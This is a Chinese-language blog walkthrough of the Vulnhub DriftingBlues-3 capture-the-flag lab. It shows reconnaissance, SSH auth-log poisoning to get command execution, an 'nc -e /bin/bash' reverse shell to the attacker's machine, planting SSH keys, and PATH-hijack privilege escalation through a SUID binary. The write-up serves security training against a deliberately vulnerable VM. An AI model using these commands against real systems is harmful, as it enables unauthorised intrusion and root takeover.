看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3

Vulnhub靶机DriftingBlues-3渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:反弹shell:
        • ③:ssh私钥登入:
        • ④:命令劫持提权:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。

Vulnhub靶机下载:

官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/

下载好了把安装包解压 然后试用VMware即可。

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第1张图片
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第2张图片

Vulnhub靶机漏洞详解:

前言:这里又是DriftingBlues-2的问题 需要自己配网卡
具体参考:https://blog.csdn.net/Aluxian_/article/details/125095660?spm=1001.2014.3001.5501

①:信息收集:

kali里使用netdiscover发现主机
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第3张图片
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.138

使用命令:nmap -sS -A -T4 -n 192.168.205.138

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第4张图片
这里开启了22端口和80端口 dirb 扫一下 发现了robotos.txt 发现了/eventadmins继续访问然我们检测/littlequeenofspades.html
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第5张图片
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第6张图片
在这里插入图片描述
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第7张图片
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第8张图片
发现好像是一串个歌词 但是好像没啥用 F12查看源代码 哦呦!!发现是一串base64(开心坏了)直接解码

base64:http://www.jsons.cn/base64

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第9张图片

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第10张图片
最终得到了 /adminsfixit.php 继续访问 发现是ssh 日志记录 可以尝试往日志文件写入一句话后门
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第11张图片
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第12张图片

②:反弹shell:

看到出现ssh auth log --> ssh身份验证日志,并且注意到登录用户名显示在日志中,也就是说如果我们使用ssh登陆时,将用户名写成一句话就可以写马进日志中

使用命令:ssh ''@192.168.205.138

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第13张图片

http://192.168.205.138/adminsfixit.php?a=ls #执行成功

使用nc回弹shell

kali开启监听:nc -lvnp 4444
?xa=nc -e /bin/bash 192.168.205.133 4444
python -c 'import pty; pty.spawn("/bin/bash")' #交互shell

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第14张图片
进入home下 发现robertj用户 然后进去 查看隐藏文件 ls-al 发现 .ssh文件
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第15张图片

直接在目标机生成一个公钥:ssh-keygen -t rsa
将生成的私钥保存到:/home/robertj/.ssh/id_rsa 
将 SSH 公钥文件重命名为 authorized_keys ,用于 SSH 登陆认证
cat id_rsa.pub > authorized_keys
然后将私钥复制到本机

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第16张图片
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第17张图片
然后把这ssh 私钥复制到桌面 因为我这里输入了密码:123456 所以等下也要输入!!!

③:ssh私钥登入:

赋予权限:chmod 400 id_rsa
使用命令:ssh [email protected] -i id_rsa
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第18张图片

④:命令劫持提权:

使用命令:find / -perm -u=s -type f 2>/dev/null
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第19张图片
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第20张图片

大概的原理就是 执行系统命令所以我们可以自行编写一个同名文件,
比如说cat,因为我们猜测getinfo中使用了cat命令,如若我们可以添加环境变量,getinfo在调用命令时首先检索环境变量就会调用到我们伪造的cat,执行我们想要的命令,来达到提权的效果,即使用环境变量进行命令劫持提权

export PATH=/tmp/:$PATH     把/tmp路径加入到系统路径中。
cd /tmp						
echo '/bin/bash' > ip		把/bin/bash写入到ip中。
chmod +x ip					增加执行权限
/usr/bin/getinfo

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第21张图片

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_第22张图片
至此获取到了所有得flag,渗透测试结束。

Vulnhub靶机渗透总结:

1.解决扫不到靶机的问题(第二次遇到这种情况)
2.信息收集其中的base64编码(偏ctf)
3.通过SSH日志信息记录反弹shell(新知识点,第一次做花的时间比较多)
4.这次有个命令劫持提权 通过修改环境变量实现(新知识点)

最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

你可能感兴趣的:(渗透测试,DriftingBlues系列,vulnhub靶机,提权,ssh私钥,反弹shell)